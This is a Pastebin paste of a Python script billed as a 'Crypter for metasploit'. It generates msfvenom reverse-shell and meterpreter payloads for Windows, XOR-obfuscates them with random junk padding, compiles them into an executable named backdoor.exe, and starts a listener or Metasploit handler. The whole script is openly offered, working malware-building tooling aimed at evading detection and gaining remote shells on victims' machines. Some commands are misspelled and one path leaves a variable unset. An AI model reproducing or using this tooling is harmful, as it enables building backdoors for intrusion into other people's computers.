Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/python
- #=====================================
- #
- # This Script requires
- # http://pastebin.com/yfbYZRwc
- #
- #=====================================
- #coding: utf-8
- from struct import *
- import os
- import commands
- import subprocess
- import random
- os.system("clear")
- print "*********************************************"
- print " : Crypter for metasploit :"
- print " Edited by: Sh3LlDu5t and Cyb4FrE3z"
- print "*********************************************"
- print ""
- host = raw_input("lhost (e for external ip) ?").strip()
- if host == 'e':
- os.system("curl checkip.dyndns.org >> ip.txt")
- lhost = commands.getoutput('cat ip.txt')
- os.system("rm ip.txt")
- os.system("clear")
- print "[*] lhost: ", lhost
- else:
- lhost = host
- print "[*] lhost: ", lhost
- lport = raw_input("lport ?").strip()
- print "[*] lport: ", lport
- print "**************************************"
- print "1) windows/shell_reverse_tcp"
- print "2) windows/shell/reverse_tcp"
- print "3) windows/shell/reverse_tcp_dns"
- print "4) windows/shell/reverse_http"
- print "5) windows/meterpreter/reverse_tcp"
- print "6) windows/meterpreter/reverse_tcp_dns"
- print "7) windows/meterpreter/reverse_http"
- print "**************************************"
- payload = raw_input("Select a payload (1-7):").strip()
- payload_raw = "temp.raw"
- out = "temp.c"
- structure = "structure.c"
- key = random.randint(0,255)
- print "[*] Generating random junk..."
- print "[*] Randomizing file size..."
- randomSize = random.randint(20480,25600)
- junkA = ""
- junkB = ""
- junkA += "\""
- for i in xrange(1,randomSize):
- junkA += chr(random.randint(65,90))
- junkA += "\""
- junkB += "\""
- for i in xrange(0,randomSize):
- junkB += chr(random.randint(65,90))
- junkB += "\""
- print "[*] Generating metasploit shellcode..."
- if payload == "1":
- os.system("msfvemon -p windows/shell_reverse_tcp LHOST=%s LPORT=%s -e x86/shikata_ga_nai -i 8 -f raw -o %s " % (lhost,lport,payload_raw))
- elif payload == "2":
- os.system("msfvemon -p windows/shell/reverse_tcp LHOST=%s LPORT=%s -e x86/shikata_ga_nai -i 8 -f raw -o %s" % (lhost,lport,payload_raw))
- elif payload == "3":
- os.system("msfvenom -p windows/shell/reverse_tcp_dns LHOST=%s LPORT=%s -e x86/shikata_ga_nai -i 8 -f raw -o %s" % (lhost,lport,payload_raw))
- elif payload == "4":
- os.system("msfvenom -p windows/shell/reverse_http LHOST=%s LPORT=%s -e x86/shikata_ga_nai -i 8 -f raw -o %s" % (lhost,lport,payload_raw))
- elif payload == "5":
- os.system("msfvenom -p windows/meterpreter/reverse_tcp LHOST=%s LPORT=%s -e x86/shikata_ga_nai -i 8 -f raw -o %s" % (lhost,lport,payload_raw))
- elif payload == "6":
- os.system("msfvenom -p windows/meterpreter/reverse_tcp_dns LHOST=%s LPORT=%s -e x86/shikata_ga_nai -i 8 -f raw -o %s" % (lhost,lport,payload_raw))
- elif payload == "7":
- os.system("msfvenom -p windows/meterpreter/reverse_http LHOST=%s LPORT=%s -e x86/shikata_ga_nai -i 8 -f raw -o %s" % (lhost,lport,payload_raw))
- a = open(payload_raw,"rb")
- b = open(out,"w")
- payload_raw = a.read()
- tempArray = []
- outArray = []
- x = 0
- print "[*] Encoding with XOR key: ", hex(key)
- print "[*] Obfuscating shellcode..."
- length = int(len(payload_raw)*2)
- for i in xrange(0,length):
- if i % 2 == 0:
- tempArray.append(unpack("B",payload_raw[x])[0]^key)
- x += 1
- else:
- randomByte = random.randint(65,90)
- tempArray.append(randomByte)
- for i in range(0,len(tempArray)):
- tempArray[i]="\\x%x"%tempArray[i]
- for i in range(0,len(tempArray),15):
- outArray.append('\n"'+"".join(tempArray[i:i+15])+"\"")
- outArray = "".join(outArray)
- devide = "i % 2;"
- open_structure = open(structure).read()
- code = open_structure % (junkA,outArray,junkB,key,length,devide)
- b.write(code)
- b.flush()
- print "[*] Compiling trojan horse..."
- os.system("i586-mingw32msvc-gcc -mwindows temp.c")
- print "[*] Stripping out the debugging symbols..."
- os.system("strip --strip-debug a.exe")
- print "[*] Finishing..."
- os.system("mv a.exe backdoor.exe")
- if payload == "1":
- print "[*] Starting the netcat listener..."
- os.system("nc -lvp %s" % (lport))
- elif payload == "2":
- PAYLOAD = "windows/shell/reverse_tcp"
- elif payload == "3":
- PAYLOAD = "windows/shell/reverse_tcp_dns"
- elif payload == "4":
- PAYLOAD = "windows/shell/reverse_http"
- elif payload == "5":
- PAYLOAD = "windows/meterpreter/reverse_tcp"
- elif payload == "6":
- PAYLOAD = "windows/meterpreter/reverse_tcp_dns"
- elif payload == "7":
- PAYLOAD = "windows/meterpreter/reverse_http"
- print "[*] Cleaning up..."
- os.system("rm temp.c")
- os.system("rm temp.raw")
- # write out rc file
- filewrite = file("handler.rc", "w")
- filewrite.write("use multi/handler\nset payload %s\nset LHOST %s\nset LPORT %s\nset ExitOnSession false\nexploit -j\n" % (PAYLOAD,lhost,lport))
- filewrite.close()
- #starting handler
- ans = raw_input("Do you want to start a handler now? (y/n)").strip()
- if ans == "y":
- print "[*] Starting metasploit handler..."
- os.system("msfconsole -r handler.rc")
- elif ans == "n":
- print "[*] Run msfconsole -r handler.rc to start handler"
- print "[*] Done !"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement